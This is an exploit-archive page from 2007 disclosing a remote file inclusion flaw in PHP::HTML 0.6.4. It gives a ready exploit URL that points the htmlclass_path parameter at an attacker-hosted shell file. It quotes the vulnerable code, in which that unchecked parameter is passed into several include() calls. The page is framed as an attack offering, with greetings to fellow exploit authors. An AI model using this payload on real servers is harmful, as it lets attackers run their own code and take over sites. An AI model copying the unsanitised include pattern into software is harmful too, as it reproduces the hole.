[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP::HTML 0.6.4 (phphtml.php) Remote File Inclusion Vulnerability
# Published : 2007-06-14
# Author : o0xxdark0o
# Previous Title : Sitellite CMS <= 4.2.12 (559668.php) Remote File Inclusion Vulnerability
# Next Title : XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
phphtml
v 0.6.4
FOUND BY : o0xxdark0o
Website: http://www.sitellite.org/
DOWNLOAD : http://sourceforge.net/projects/phphtml
REMOTE FILE INCLUDE
############################################################
FILE :
PATHphphtml.php
############################################################
EXP:
xxx.compathphphtml.php?htmlclass_path=SH3ll.txt?
############################################################
CODE: on line 19
<?
define (PHPHTML_VERSION, "0.6.4");
/* gettext is not implemented for now*/
$use_gettext=0;
/* We need to know where the PHP::HTML tree is installed.*/
if (strlen(chop($htmlclass_path))==0) $htmlclass_path=".";
if ($use_gettext==1)
{
if (function_exists("gettext"))
{
$gettext_enable=1;
}
}
include("$htmlclass_path/ext.php"); /* Some extenstions to PHP */
include("$htmlclass_path/core.php"); /* PHP::HTML Core */
include("$htmlclass_path/xhtml.php"); /* XHTML extensions */
include("$htmlclass_path/xhtml_table.php"); /* XHTML tables extensions */
include("$htmlclass_path/xhtml_forms.php"); /* XHTML forms extensions */
include("$htmlclass_path/xhtml_doc.php"); /* XHTML document extension */
include("$htmlclass_path/wml.php"); /* WML extension */
/* Below is a debugging example */
/*
$t=new XHTML_doc("Hello");
echo $t->render();
*/
############################################################
thanks for all my friends.. str0ke .... oxdo .... cold z3ro
www.hach-teach.org - www.3asfh.com
############################################################
BY : o0xxdark0o
o0xxdark0o@msn.com
# www.Syue.com [2007-06-14]